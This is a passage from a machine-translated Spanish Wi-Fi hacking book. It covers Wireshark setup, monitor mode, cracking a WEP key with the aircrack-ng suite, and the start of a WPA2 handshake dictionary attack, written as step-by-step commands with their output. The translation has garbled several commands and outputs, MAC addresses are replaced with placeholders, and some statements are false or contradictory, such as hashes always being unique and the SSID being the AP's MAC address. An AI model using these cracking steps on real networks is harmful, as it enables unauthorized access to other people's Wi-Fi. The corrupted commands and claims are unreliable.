ID de conexión/duración: si se usa como un campo de duración, indica el tiempo (en

microsegundos) que se asignará al canal para la transmisión exitosa de una trama MAC. En algunos
marcos de control, este campo contiene una asociación o conexión,

37
Machine Translated by Google

identificador

Direcciones: el número y el significado de los campos de dirección de 48 bits dependen del contexto.
La dirección del transmisor y la dirección del receptor son las direcciones MAC de las estaciones unidas al BSS que

transmiten y reciben tramas a través de la LAN inalámbrica.

El ID del conjunto de servicios (SSID) identifica la LAN inalámbrica a través de la cual se envía una trama.

transmitido. Para un IBSS, el SSID es un número aleatorio generado en el momento en que se forma la red. Para

una LAN inalámbrica que forma parte de una configuración más grande, el SSID identifica el BSS a través del cual se

transmite la trama; específicamente, el SSID es la dirección de nivel MAC del AP para este BSS.

Finalmente, la dirección de origen y la dirección de destino son las direcciones MAC de las estaciones,

inalámbricas o de otro tipo, que son la última fuente y

destino de este marco. La dirección de origen puede ser idéntica a la dirección del transmisor y la dirección de

destino puede ser idéntica a la dirección del receptor.

Control de secuencia: contiene un subcampo de número de fragmento de 4 bits, que se utiliza para

la fragmentación y el reensamblaje, y un número de secuencia de 12 bits que se utiliza para numerar tramas

enviadas entre un transmisor y un receptor determinados.

Cuerpo de la trama: contiene una MSDU o un fragmento de una MSDU. La MSDU es una unidad de datos de

protocolo LLC o información de control MAC.

Secuencia de comprobación de tramas: una comprobación de redundancia cíclica de 32 bits.

Es importante tener en cuenta que los administradores de sistemas utilizan Wireshark para verificar si los datos confidenciales se

transmiten de forma segura (cifrados), al mismo tiempo que un pirata informático también puede utilizarlos en redes no seguras (no

cifradas).

Aprenderemos cómo un pirata informático puede hacer mal uso de herramientas legítimas con fines maliciosos una vez que está
conectado a la red.

Antes de pasar al proceso de instalación y tutorial es necesario conocer la historia detrás de la herramienta.

Historia
Wireshark, originalmente llamado Ethereal, fue escrito y lanzado por Gerald Combs, quien se graduó en ciencias de la

computación en la Universidad de Missouri-Kansas City. A fines de la década de 1990, las herramientas comerciales de análisis

de protocolos tenían precios cercanos a los $1500 y tampoco eran compatibles con las principales plataformas de la empresa

(Solaris y Linux). Entonces, Gerald comenzó a escribir Ethereal y lanzó la primera versión en 1998.

¿Por qué Ethereal fue renombrado?

En 2006, Combs aceptó un trabajo con tecnologías CACE. Combs no poseía la marca comercial de Ethereal (propiedad de Network

Integration Services), pero tenía los derechos de autor de la mayoría de los

38
Machine Translated by Google

El código fuente de Ethereal, por lo que usó el contenido del repositorio de Ethereal Subversion como base para
el repositorio de Wireshark y luego nombró al proyecto como "Wireshark".

Según Wikipedia,

“Wireshark ha ganado varios premios de la industria a lo largo de los años, incluidos eWeek, InfoWorld,

y Revista PC. También es el rastreador de paquetes mejor calificado en la seguridad de la red [Link].

encuesta de herramientas y fue el proyecto Source Forge del mes en agosto de 2010”.

Desde 2006 en adelante, Wireshark ha estado entre las 10 mejores herramientas utilizadas por los probadores de penetración y los
piratas informáticos.

Wireshark viene preinstalado en la mayoría de las distribuciones de pentesting como Kali Linux, Backbox,
Pentoo, Samurai WTF. Pero siendo un probador de penetración, administrador de red o un niño de secuencias
de comandos, es muy esencial para uno conocer el proceso de instalación de cualquier herramienta y no confiar
en las herramientas preinstaladas y simplemente usarlas.
Las distribuciones de Pentesting están diseñadas para que los pentesters trabajen más rápido, al no tener
que instalar y reparar el sistema cada vez, y también con fines educativos. Pero la gente tiende a malinterpretar
esto con menos trabajo. Puede parecer lo mismo pero no lo es.
Debe aprender a instalar y reparar el software. No solo le brindará una comprensión profunda del
funcionamiento de la herramienta, sino que, al hacerlo, abrirá nuevas posibilidades para que pueda hacer más.
Es como una inversión valiosa que parece pequeña en este momento, pero lo recompensa a largo plazo, más
allá de sus pensamientos y entendimientos.

Instalación y configuración
Wireshark está disponible para Windows, Mac y Linux. Puede descargar Wireshark desde el sitio oficial.

Pero estoy más interesado en enseñar cosas desde cero. Entonces, compilemos Wireshark en Linux desde el
código fuente.

Descargue el último código fuente aquí. y guardarlo en el escritorio.

Abra la terminal y escriba:

cd ~/Desktop #Mover del directorio actual al escritorio

tar xvf wireshark*.bz2 #Extraer paquete comprimido tipo bunzip2
cd wireshark* #Mover al directorio extraído

Ejecute el script [Link] para configurar su directorio de compilación:

./[Link]

Ejecute el script de configuración . Comprueba su sistema Linux para asegurarse de que tiene las
dependencias de biblioteca adecuadas, además del compilador adecuado para compilar el código fuente. ./
configure --enable-setcap-instalación

Para compilar e instalar Wireshark, escriba

39
Machine Translated by Google

hacer #Construir paquetes

hacer instalar #Instalar binarios en el sistema

Ejecutar Wireshark,
tiburón alambre &

o simplemente presione Alt+F2 e ingrese Wireshark.

Presiona Ok, si muestra un error y continúa.

Como sabe, Wireshark puede capturar tráfico de ethernet, USB, Wi-Fi (cuando está autenticado) o Wi-Fi (en modo

monitor).

Puede seleccionar cualquier interfaz (Ethernet, USB o Wi-Fi) y comenzar a capturar tráfico desde ella. Pero,

Teniendo en cuenta el alcance de este libro, tenemos una tarjeta inalámbrica y aún no nos hemos conectado ni hemos penetrado

en ninguna red. Entonces, no nos deja otra opción que olfatear el aire y eso solo es posible poniendo la tarjeta inalámbrica en modo

monitor.

modo monitor
¡Primero lo primero! Elimina los procesos que podrían causar problemas.
airmon-ng comprobar matar

Matar estos procesos:

Nombre de PID

3694 wpa_supplicant
3697 dhcliente
3711 avahi-demonio-ch

Para poner la tarjeta en modo monitor, primero busque el nombre de la interfaz inalámbrica.

Escriba iwconfig en la terminal y verifique el nombre de la interfaz inalámbrica, wlan0 en este caso

lo sin extensiones inalámbricas.

eth0 sin extensiones inalámbricas.
wlan0 IEEE 802.11 ESSID: desactivado/
cualquiera Modo: Punto de acceso gestionado: Potencia de transmisión no asociada
= 20 dBm Límite corto de reintento: 7 RTS thr: desactivado Fragmento thr: desactivado
Clave de cifrado: desactivada
Administración de energía: apagado

Modo: Administrado, vea la línea 4. Para habilitar el modo de monitoreo, ingrese

airmon-ng iniciar wlan0

PHY Interfaz Conductor conjunto de chips

phy3 wlan0 rt2800usb Tecnología Ralink, Corp. RT2870/RT3070

(modo monitor mac80211 vif habilitado para [phy3]wlan0 en [phy3]wlan0mon)

(modo de estación mac80211 vif deshabilitado para [phy3]wlan0)

Escriba ifconfig para verificar la nueva interfaz del modo de monitor. wlan0mon en este caso. el tuyo podría

40
Machine Translated by Google

ser diferente, como wlan1mon, wlan2mon, etc.

wlan0mon: flags=4163<ARRIBA, TRANSMISIÓN, EN EJECUCIÓN, MULTITRANSMISIÓN> mtu 1500
sin especificar 00-C0-CA-5A-34-B6-30-3A-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
Paquetes RX 5 bytes 1189 (1,1 KiB)
Errores de RX 0 descartados 5 excesos 0 marco 0
Paquetes TX 0 bytes 0 (0.0 B)
Errores de TX 0 caídas 0 excesos 0 operador 0 colisiones 0

La tarjeta finalmente está en modo monitor. ¡Olfateemos el aire con Wireshark!

Seleccionar interfaz de rastreo

Tan pronto como habilite el modo de monitor, wlan0mon aparecerá en la lista de interfaces de Wireshark.
También verá una representación gráfica en tiempo real del tráfico recibido por una interfaz.

Haga doble clic en wlan0mon para ingresar a la ventana de visualización en vivo. Paquetes mostrados en tiempo
real con una precisión ordenada de alto nivel. Observe el valor decimal de la columna Tiempo a continuación. si, hasta el 9
¡lugar! Lo que significa que Wireshark mantendrá un orden de paquetes perfecto incluso con dos paquetes con una
diferencia de 1 nanosegundo. ¿Ves el poder? Será mejor que te inclines ante los desarrolladores por esto.

41
Machine Translated by Google

deja de olfatear
Haga clic en el botón rojo en la esquina superior izquierda de la ventana cuando desee detenerse.

Filtros y análisis de paquetes

Se capturan numerosos paquetes en un lapso de tiempo muy corto. Especialmente cuando la tarjeta está en modo monitor,

dificulta el análisis de paquetes.

Un día u otro sentirá una gran necesidad de filtrar la salida, reducir el desorden y hacer que sea más fácil de analizar. Contiene

una variedad de filtros. Te mostraré algunos de ellos en este segmento para que entiendas cómo funcionan los filtros y hacerte

la vida más fácil.

Wireshark tiene 2 tipos de filtros, vea la columna de entrada de texto en las últimas 2 imágenes

1. Filtro de pantalla

2. Filtro de captura

Mostrar filtros
Puede aplicar filtros de visualización cuando desee buscar datos específicos. Los paquetes que no coinciden con el filtro de

visualización se ocultan, pero no se eliminan del archivo de captura original.

Hay diferentes formas de aplicar filtros de visualización.

Una forma de usar los filtros de visualización es comenzar a escribir en el campo de entrada de filtro (barra verde).

Puede aprovechar la función de autocompletar. Cuando el fondo del filtro

el cuadro se vuelve verde de rojo, significa que la cadena de filtro es válida.

No olvide presionar Aplicar o [Entrar] para aplicar el filtro.

42
Machine Translated by Google

También puede copiar y pegar cadenas de filtro en el campo de entrada de filtro.

Aquí hay unos ejemplos:

Tipo de filtro Mostrar comando de filtro

Mostrar solo marcos de baliza [Link].tipo_subtipo == 0x08

Mostrar todo excepto marcos de ![Link].tipo_subtipo == 0x08
baliza

Mostrar solo marcos de baliza y ([Link].tipo_subtipo == 0x08) || ([Link].tipo_subtipo == 0x1d)

marcos de reconocimiento

Mostrar todo excepto los marcos (![Link].tipo_subtipo == 0x08) && (![Link].tipo_subtipo == 0x1d)
beacon y ack

Puede encontrar una lista completa de los campos de filtro de pantalla 802.11 en la wlan, wlan_mgt, y
wlan_agregate Mostrar referencias de filtro.

Filtros de captura

Cuando utiliza un filtro de captura, solo los paquetes que coinciden con el filtro se vuelcan en un archivo.
Esto reducirá la cantidad de datos a capturar.

Los filtros de captura tienen una sintaxis diferente a la de los filtros de visualización.

Introduzca los filtros de captura en el campo Filtro del cuadro de diálogo Opciones de captura de Wireshark y presione el
botón Inicio.

Aquí hay unos ejemplos:

Comando de filtro de captura de tipo de filtro

Captura solo marcos de baliza wlan[0] == 0x80
Captura todo excepto los marcos de baliza wlan[0] != 0x80
Captura solo marcos de baliza y marcos de reconocimiento wlan[0] == 0xd4
Captura todo excepto los marcos de baliza wlan[0] != 0x80 y wlan[0] != 0xd4
y ack marcos:

El filtro de captura no es un filtro de visualización

Los filtros de captura (como el puerto tcp 80) no deben confundirse con los filtros de visualización
(como [Link] == 80). El primero es mucho más limitado y se utiliza para reducir el tamaño de una captura de
paquetes sin formato. Estos últimos se utilizan para ocultar algunos paquetes de la lista de paquetes.
Los filtros de captura se configuran antes de iniciar una captura de paquetes y no se pueden modificar durante la
captura. Los filtros de pantalla, por otro lado, no tienen esta limitación y puede cambiarlos sobre la marcha.

En la ventana principal, uno puede encontrar el filtro de captura justo encima de la lista de interfaces y en el diálogo
de interfaces.
El filtro de visualización se puede cambiar encima de la lista de paquetes como se puede ver en esta imagen:

43
Machine Translated by Google

Usaremos el filtro de visualización por ahora,

Filtrar paquetes con un SSID específico. En este ejemplo, "dlink" es el SSID que filtraremos

En la captura de pantalla anterior, hemos ingresado el filtro en el cuadro verde, es decir , 'wlan_mgt.ssid ==
"dlink" '

Todos los paquetes que se muestran tienen un elemento común que es el nombre SSID: dlink que se estaba
transmitiendo al aire. Reemplace dlink con su SSID deseado.
Wireshark captura todo tipo de paquetes y puede pensar en filtrar paquetes con una dirección MAC específica durante el
pentest.
En el siguiente ejemplo, filtraremos todos los paquetes transmitidos por cualquier AP. Los paquetes de difusión tienen una
dirección MAC de destino como "[Link]". Puedes ver esto en la imagen anterior también.

44
Machine Translated by Google

[Link] == [Link] tiene una sintaxis como el lenguaje Java, aquí wlan es el paquete y addr, que es la
dirección del hardware, es la clase definida en el paquete wlan .

Guardar paquetes
Cuando haya filtrado los paquetes deseados, es hora de guardarlos para analizarlos en el futuro.
• Ir a Archivo.
• Haga clic en Guardar.

• Busque la ubicación, ingrese el nombre del archivo y presione [Enter]

La próxima vez que inicie Wireshark y desee analizar paquetes guardados previamente
Vaya a Archivo > Abrir. Examine el archivo pcap. Haz lo que quieras.

Codificación de color
Habría notado que todos los cuadros capturados se mostraban en blanco y negro.
Eso no es todo. Wireshark muestra los paquetes en colores.
En los ejemplos anteriores, los paquetes eran paquetes de transmisión y Wireshark no aplica ningún código de color a los
paquetes de transmisión.
De forma predeterminada, el verde es el tráfico TCP, el azul oscuro es el tráfico DNS, el azul claro es el tráfico UDP y
el negro identifica los paquetes TCP con problemas.
Por ejemplo, aplicando un filtro “dns” (Cuando está conectado a Internet) vemos una salida de paquetes, todos resaltados
con color azul oscuro.

Las solicitudes de DNS se propagan a través del puerto 53, como el puerto 21 para FTP, 22 para SSH y 80 para HTTP

Conclusión
Ahora tenemos nuestro Wireshark práctico y pudimos vislumbrar el uso de filtros Wireshark para reducir el desorden.
Aprenderemos más sobre Wireshark y sus filtros a lo largo de la serie.
A continuación, veremos cómo descifrar WEP usando el conjunto de herramientas aircrack-ng e inspeccionar el archivo
pcap capturado usando Wireshark.

45
Machine Translated by Google

Descifrado WEP usando Aircrack-ng

WEP (Privacidad equivalente por cable) es el mecanismo de encriptación más débil y obsoleto que utilizan los enrutadores
(puntos de acceso) para encriptar los paquetes de datos que pasan a través del enrutador.

WEP usa encriptación de 64 y 128 bits como estándar, pero los investigadores de seguridad descubrieron muchas fallas
en el mecanismo de encriptación de We, como la generación de claves estáticas, el método rápido de regeneración de
claves. Se descubrieron muchas vulnerabilidades y se diseñaron muchos ataques en consecuencia.
Ataques como

• El ataque Chop-Chop de Korek, por Korek

• Ataque de café con leche, por Vivek Ramachandran
• Ataque de fragmentación
• Ataque Hirte, una extensión del ataque Caffe-Latte

Visión de conjunto

WEP se ha descifrado de tantas maneras diferentes que, independientemente del tamaño de cifrado, es decir,
64 bits o 128 bits o 152 bits o la complejidad y la longitud de su clave, su contraseña para el punto de acceso cifrado WEP
está destinada a ser descifrada. Todo lo que se necesita es una cantidad significativa de IV (vectores de inicialización) o,
en términos simples, paquetes de datos que se utilizarán para descifrar el tráfico capturado y recuperar la clave.

WEP está desactualizado ahora, tenemos mejores soluciones para eso. WPA2, enrutadores habilitados para WPS, que
en este momento no están rotos en términos de mecanismo de encriptación. Aunque las claves también se pueden
recuperar en el caso de WPA2 y WPS, eso lo estudiaremos en el próximo capítulo.
podrías estar pensando eso,

¿Por qué estamos estudiando WEP Cracking cuando está desactualizado?

La razón es que es necesario aprender y comprender el mecanismo de craqueo WEP, como

• Necesario para saber dónde empezó todo.

• Es fácil de entender cuando empiezas poco a poco. Más grande no será un desastre.

• Todavía encontrará muchos puntos de acceso cercanos que utilizan WEP como esquema de cifrado predeterminado.

Vamos a empezar,

Paso 1:
Conecte su tarjeta inalámbrica y encienda su Terminal Kali e ingrese airmon-ng para verificar que la utilidad airmon-ng
detecte su interfaz inalámbrica.
Usaremos Wlan0, es decir, nuestra tarjeta Alfa, en este tutorial.

46
Machine Translated by Google

Paso 2:
Ejecute airmon-ng check kill en la terminal para todos los programas problemáticos.

Matar estos procesos:

Nombre de PID

3694 wpa_supplicant
3697 dhcliente
3711 avahi-demonio-ch

Siempre ejecute airmon-ng check kill antes de poner la tarjeta inalámbrica en modo monitor.

También puede eliminar estos procesos manualmente, lo discutiremos un poco más adelante.

Paso 3:
Ponga la tarjeta Alfa (wlan0) en modo monitor.

airmon-ng iniciar wlan0

PHY Interfaz Conductor conjunto de chips

phy1 wlan0 rt2800usb Tecnología Ralink, Corp. RT2870/RT3070

(modo monitor mac80211 vif habilitado para [phy1]wlan0 en [phy1]wlan0mon)

(modo de estación mac80211 vif deshabilitado para [phy1]wlan0)

La tarjeta Alfa ahora está en modo monitor (wlan0mon), es hora de escanear el aire. Para eso, usaremos
airodump-ng del conjunto de herramientas aircrack-ng.

Paso 4:
Ejecute airodump-ng [interfaz de modo de monitor] e identifique el AP habilitado para WEP.

airodump-ng wlan0mon
CH 1 ][ Transcurrido: 3 s ][ 2017-07-12 22:12

BSSID Balizas PWR RXQ #Datos, #/s CH MB ENC CIPHER AUTH ESSID

64: 66: B3: 6E: B0: 8A -42 79 436 455 1 1 54e. WEP WEP OPN rootsh3ll
54: B8: 0A: 8E: 36: 00 -73 0 138 0 0 1 54e WEP WEP abhinav

BSSID ESTACIÓN Tasa de PWR Perdió Sonda de marcos

64: 66: B3: 6E: B0: 8A 2C: 33: 61: 2D: C6: 3G -46 54e-24 0 8 raícesh3ll
[Link] [Link] -60 0 - 1e 0 4 raícesh3ll

rootsh3ll es el ESSID, y las direcciones MAC resaltadas en ROJO son los dispositivos asociados con el enrutador con
MAC [Link]

Después de identificar el AP habilitado para WEP, presione CTRL-C y observe la siguiente información:

BSSID (AP MAC): 64: 66: B3: 6E: B0: 8A

ESSID (Nombre AP): raícesh3ll

47
Machine Translated by Google

Canal (CH): 1

Estación (STA): [Link]

Usaremos esta información según el escenario. También se puede usar para reducir el tamaño del archivo .pcap al
capturar datos de este AP exclusivamente. Esto se puede hacer con airodump ng, fácilmente.

Paso 5:
Especifique el BSSID, el número de canal para airodump-ng para la captura de datos exclusivos y guárdelos en un archivo
para que podamos usar el archivo de volcado para descifrar la frase de contraseña WEP.

airodump-ng --bssid [Link] -c 1 -w rootsh3ll wlan0mon

CH 1 ][ Transcurrido: 19 s ][ 2017-07-12 22:12

BSSID Balizas PWR RXQ #Datos, #/s CH MB ENC CIPHER AUTH ESSID

64: 66: B3: 6E: B0: 8A -42 79 9036 1550 1 1 54e. WEP WEP OPN rootsh3ll
54: B8: 0A: 8E: 36: 00 -73 0 138 0 0 1 54e WEP WEP abhinavtsj

BSSID ESTACIÓN Tasa de PWR Perdió Sonda de marcos

64: 66: B3: 6E: B0: 8A 2C: 33: 61: 2D: C6: 3G -46 54e-24 0 832 rootsh3ll
[Link] [Link] -60 0 - 1e 0 834 rootsh3ll

Desglose de comandos:
--bsid: Dirección MAC del punto de acceso
-C: Número de canal operativo de AP, consulte la esquina superior derecha que indica CH. No.
-en: Nombre de archivo de salida, pon el nombre que quieras

Observe la sección #Data de la salida. Estos son los datos (en bytes) capturados del AP
rootsh3ll.

En el caso de los AP base WEP, #Data son los IV que se utilizarán para descifrar la clave.
Recuerde, más paquetes de datos, más fácil de descifrar WEP.

CH 1 ][ Transcurrido: 30 s ][ 2017-07-12 22:13

BSSID Balizas PWR RXQ #Datos, #/s CH MB ENC CIPHER AUTH ESSID

64: 66: B3: 6E: B0: 8A -62 79 18092 3505 1 1 54e. WEP WEP OPN rootsh3ll
54: B8: 0A: 8E: 36: 00 -73 0 192 0 0 1 54e WEP WEP abhinavtsj

BSSID ESTACIÓN Tasa de PWR Perdió Sonda de marcos

64: 66: B3: 6E: B0: 8A 2C: 33: 61: 2D: C6: 3G -46 54e-24 0 1768 raícesh3ll
[Link] [Link] -60 0 - 1e 0 983 rootsh3ll

Ahora aquí hay una trampa. Observe los paquetes de datos, solo 3505. Para iniciar el proceso de descifrado, debe
tener al menos 5000 IV, ya que la contraseña más fácil de 5 dígitos como 11111, 12345 se puede descifrar con un
número tan bajo. de IVs o paquetes de datos.
Pero eso no es un problema. Airodump-ng se ejecuta sin cesar y seguirá capturando los datos

48
Machine Translated by Google

mientras que vamos a empezar a descifrar en una nueva terminal.

Paso 6:

Ejecute aircrack-ng [airodump-ng output filename].cap y espere a que aparezca la clave.

aircrack-ng [Link]
Aircrack-ng 1.2 rc4

[Link] 134401 claves probadas (obtuve 25663 IV)

byte de profundidad de KB (voto)

0 56/57 DA (27904) 2F (27648) 43 (27648) 67 (27648) 7C (27648) 81 (27648) A1 (27648) AF (27648) B8 (27648)
1 24/1 D8 (29696) 06 (29440) 29 (29440) 33 (29440) B1 (29440) 03 (29184) FC (29184) 26 (28928) BC (28928)
2 13/ 47 FB(29952) 27(29696) 48(29696) AB(29696) D4(29696) 49(29440) 64(29440) 6E(29440) C0(29440)
3 13/3 E3(29952) 32(29696) 61(29696) 89(29696) 06(29440) D3(29440) E8(29440) 12(29184) 31(29184)
0/ 3 C9(39424) 1C(33024) DB(33024) D8(32768) 01(32256) B2(31232) 02(30976) 1A(30976) C7(30976) 4

Ha fallado. A continuación, intente con 30000 IV.

Afortunadamente, aircrack-ng también se descompone en un proceso interminable, por lo que no es necesario ingresar

comandos una y otra vez.

Como puede ver en la imagen de arriba, aircrack-ng obtuvo 25ÿ663 IV, pero no tuvo éxito y esperó a que #data se escribiera en el

archivo cap e intente nuevamente con 30ÿ000 IV.

Después de un significativo no. de los #paquetes de datos son capturados y volcados, aircrack-ng mostrará la contraseña con

un resultado similar

Aircrack-ng 1.2 rc4

[Link] Probó 1192814 claves (obtuvo 169452 IV)

KB byte de profundidad (voto)

0 0/1 69 (229376) 13 (184320) 4E (183808) 17 (183296) D0 (183040) 6B (182528) F3 (182528)
1 0/ 1 61(241408) 52(186368) B8(185088) 44(184320) 6A(183552) 79(182528) 9F(182528)
2 0/1 6D (228096) 59 (186624) 08 (185344) 81 (184320) 0B (183040) 4B (182528) 58 (181248)
3 0/ 1 20(224000) 33(185600) 64(185600) 19(185088) 1A(183552) E1(182528) 63(182016)
4 0/1 72 (241408) 01 (188928) 1F (186112) E9 (184576) 4F (183296) 7E (183296) 9B (182016)
5 0/ 1 6F(230912) EF(185088) 58(184832) 4B(184320) 51(183552) 4A(183296) E2(183040)
6 0/ 2 6F(194816) 2E(189184) 0B(184064) 5F(183808) B9(183552) A1(183296) E8(182784)
7 0/ 1 74(241152) 4F(188928) 91(188928) 9E(188416) DD(186880) 60(186368) 53(184320)
8 0/ 1 73(216832) FD(186624) 79(185856) 64(184576) 30(184320) 09(183296) B6(183296)
9 0/ 1 68(212224) 74(186880) 3D(186624) EE(185856) FE(184064) 6E(183552) EB(182784)
10 0/1 EE (189184) EF (186112) 15 (185856) 0E (185344) DF (185344) 39 (184832) 44 (183808)
11 0/ 1 46(186112) EA(185088) C2(183808) 41(183040) FE(183040) 66(182528) DF(182528)
12 2/ 10 72(186776) 4E(182772) B7(182756) 17(181852) E5(181788) 48(181096) 97(180956)

¡LLAVE ENCONTRADA! [ [Link] ] (ASCII: soy rootsh3ll )

Descifrado correctamente: 100%

Esta es la forma ideal de descifrar una clave de red habilitada para WEP.

49
Machine Translated by Google

Factores que afectan la cantidad de #Datos capturados:

1. Usuario conectando/Desconectando, LENTO 2.
Navegando/Descargando a través de la red, MÁS RÁPIDO (toma segundos para 20-40K #Data)

Se le llama ideal porque en cualquier momento no es seguro que un usuario esté descargando, conectando,
navegando o incluso conectado a la red.
¿Y que?

Aquí vienen los ataques descritos anteriormente para llevar los #Datos al límite y conseguirnos los IVs
rápidamente. Aprenderemos sobre ellos más adelante en este libro.
Ahora, a pagar lo que se debía

Otra forma de corregir el error "Modo monitor" en Kali

linux
Desde airmon-ng check, conocemos los procesos problemáticos. Simplemente deténgalos a través de la terminal
Elimine al administrador de la red, 1. Abra la Terminal 2. Ejecute la parada del administrador de red del servicio
3. Haga lo mismo con wpa_supplicant y dhclient

Una vez que haya terminado con la prueba y desee conectarse a una red, querrá reiniciar el administrador de
red.
Iniciar/Reiniciar administrador de red
1. Abra la terminal 2. Ejecute
service network-manager start 3. Haga lo mismo
con wpa_supplicant y dhclient

Incluso si eliminó los procesos usando el comando airmon-ng check kill , aún puede usar el comando
anterior para iniciar el administrador de red y conectarse a Wi-Fi.

50
Machine Translated by Google

Cracking personal WPA2 [aircrack-ng]

Bajo ciertas circunstancias, es demasiado fácil descifrar WEP, lo que nos lleva a una pregunta obvia.

¿Cómo asegurarlo? utiliza WPA2-PSK.

¿Qué es WPA2-PSK?

WPA2-PSK, Wi-Fi Protected Access - Pre-Shared Key, es, con mucho, uno de los algoritmos de cifrado de seguridad
inalámbrica más seguros e ininterrumpidos en este momento. Todavía no hay fallas de encriptación reportadas por los
investigadores de seguridad para WPA2, por lo que un pirata informático malicioso puede aprovechar y desencriptar
fácilmente los paquetes de datos.

El cifrado puede ser el más seguro e ininterrumpido en este momento, pero el sistema WPA2 sigue siendo bastante
vulnerable a los piratas informáticos.
A diferencia de WEP, WPA2 utiliza un protocolo de enlace de 4 vías como proceso de autenticación.

Apretón de manos de 4 vías

El protocolo de enlace de cuatro vías está diseñado para que el punto de acceso (o autenticador) y el cliente inalámbrico (o
suplicante) puedan probarse mutuamente de forma independiente que conocen el PSK/PMK.
(Pairwise Master Key), sin revelar nunca la clave. En lugar de revelar la clave, el punto de acceso y el cliente cifran
los mensajes entre sí que solo pueden descifrarse utilizando el PMK que ya comparten y si el descifrado de los mensajes
fue exitoso, esto prueba el conocimiento del PMK.

El protocolo de enlace de cuatro vías es fundamental para la protección del PMK de los puntos de acceso maliciosos:
por ejemplo, el SSID de un atacante que se hace pasar por un punto de acceso real, para que el cliente nunca tenga que
decirle al punto de acceso su PMK.

Tanto WPA2-PSK como WPA2-EAP dan como resultado una clave maestra por pares (PMK) conocida tanto por el
solicitante (cliente) como por el autenticador (AP). (En PSK, el PMK se deriva directamente de la contraseña, mientras
que en EAP es el resultado del proceso de autenticación)

El PMK está diseñado para durar toda la sesión y debe exponerse lo menos posible; por lo tanto, es necesario derivar
claves para cifrar el tráfico. Se utiliza un protocolo de enlace de cuatro vías para establecer otra clave denominada clave
transitoria por pares (PTK).

El PTK se genera mediante la concatenación de los siguientes atributos: PMK, AP nonce (ANonce), STA nonce (SNonce),
dirección MAC de AP y dirección MAC de STA.

Luego, el producto se somete a una función pseudoaleatoria. El protocolo de enlace también genera la GTK (Clave temporal
de grupo), que se utiliza para descifrar el tráfico de multidifusión y transmisión.

51
Machine Translated by Google

Los mensajes reales intercambiados durante el protocolo de enlace se muestran en la figura y se explican a
continuación (todos los mensajes se envían como tramas EAPOL-Key):

1. El AP envía un valor nonce a la STA (ANonce). El cliente ahora tiene todos los
atributos para construir el PTK.

2. La STA envía su propio valor nonce (SNonce) al AP junto con un mensaje

Código de integridad (MIC), incluida la autenticación, que en realidad es un Código de integridad
y autenticación de mensajes (MAIC).
3. El AP construye y envía el GTK y un número de secuencia junto con otro MIC. Este número de secuencia se usará
en la siguiente trama de multidifusión o transmisión, de modo que la STA receptora pueda realizar una detección
básica de reproducción.
4. La STA envía una confirmación al AP.

Al igual que los paquetes de transmisión que vimos en el capítulo anterior, el protocolo de enlace de 4 vías también está
en texto sin formato.
Lo que permite a un pirata informático potencial capturar la información de texto sin formato como

• Dirección MAC del punto de acceso

• Dirección MAC del cliente

• Nombre ESSID AP

El pirata informático utiliza la información anterior para realizar un ataque de diccionario en el 4- capturado.
forma de apretón de manos (archivo PCAP). Veamos

• ¿Qué es un ataque de diccionario?

• ¿Cómo realizar un ataque de diccionario en WPA2-PSK?

52
Machine Translated by Google

¿Qué es un ataque de diccionario?

Hashing es una de las claves utilizadas en el campo de la seguridad por el profesional para proteger a los usuarios de los
atacantes maliciosos.

Un hash es simplemente una función criptográfica que convierte un dato o archivo de una longitud/tamaño arbitrario a una

longitud fija. A diferencia del cifrado, es prácticamente imposible invertirlo o revertirlo, ya que no interviene ninguna clave en el

proceso.

Los datos cifrados y codificados se pueden descifrar y decodificar respectivamente, pero no existe tal cosa como la eliminación

de hash. Y un hash siempre es único.

En un ataque de diccionario,

1. Creamos/utilizamos una lista de palabras (archivo de texto de posibles contraseñas)

2. Tome una palabra a la vez de la lista de palabras
3. Cree su hash usando la función Hash, PBKDF2 para WPA2

4. Compare el valor de salida con el hash existente.

5. Si el valor coincide, la contraseña tomada de la lista de palabras es la contraseña correcta

Los pasos anteriores están involucrados en el proceso de descifrado de frases de contraseña WPA2.

Vamos a empezar,

Paso 1
Iniciar modo monitor

ifconfig wlan0 airmon- #Comprobar si se detecta la tarjeta

ng verificar matar airmon-ng #Kill proceso que causa problemas
iniciar wlan0 #Iniciar modo monitor

La salida final debería verse así:

root@rs:~# ifconfig wlan0 wlan0:

flags=4098<TRANSMISIÓN, MULTITRANSMISIÓN> mtu 1500
éter [Link] txqueuelen 1000 (Ethernet)
Paquetes RX 0 bytes 0 (0.0 B)
Errores de RX 0 caídos 0 excesos 0 marco 0
Paquetes TX 0 bytes 0 (0.0 B)
Errores de TX 0 caídas 0 excesos 0 operador 0 colisiones 0

root@rs: ~# airmon-ng comprobar matar

Matar estos procesos:
Nombre de PID

762 wpa_supplicant

root@rs: ~# airmon-ng iniciar wlan0

PHY Interfaz Conductor conjunto de chips

phy1 wlan0 rt2800usb Tecnología Ralink, Corp. RT2870/RT3070

(modo monitor mac80211 vif habilitado para [phy1]wlan0 en [phy1]wlan0mon)

(modo de estación mac80211 vif deshabilitado para [phy1]wlan0)

Paso 2:

Iniciar captura, airodump-ng

Ahora iniciaremos airodump-ng para olfatear el aire y esperar hasta que el AP deseado y

53
Machine Translated by Google

se muestra el cliente correspondiente.

airodump-ng wlan0mon
CH 13 ][ Transcurrido: 1 min ][ 2017-07-13 01:46

BSSID Balizas PWR #Datos, #/s CH MB ENC CIPHER AUTH ESSID

64: 66: B3: 6E: B0: 8A -46 20 1 0 11 54e. WPA2 CCMP PSK rootsh3ll
D8: FE: E3: 7B: 40: A0 -64 15 388 0 1 54e. WPA CCMP PSK Ravi
[Link] -76 9 0 0 1 54e. enlace WPA2 CCMP PSK
54: B8: 0A: 8E: 36: 00 -78 dieciséis 6 0 1 54e WEP WEP abhinav

BSSID ESTACIÓN Tasa de PWR Perdió Sonda de marcos

[Link] [Link] -1 1e-0 0 1

[Link] [Link] -1 5e-0 0 388
[Link] [Link] -1 1e-0 0 8

Como puede ver en la imagen de arriba, “rootsh3ll” es el AP víctima. Ahora vamos a anotar la información
resaltada
AP (ESSID): raícesh3ll
AP MAC (BSSID): 64: 66: B3: 6E: B0: 8A
Cliente MAC: [Link]
Canal: 11

Presione CTRL-C y elimine airodump-ng.

Luego reinicie airodump-ng exclusivamente para capturar paquetes asociados con "rootsh3ll" y guarde el
protocolo de enlace de 4 vías en un archivo PCAP, digamos rootsh3ll

Paso 3:
Inicie airodump-ng, exclusivamente.

airodump-ng --bssid [Link] -c 11 wlan0mon -w rootsh3ll

CH 11 ][ Transcurrido: 12 s ][ 2017-07-13 01:56

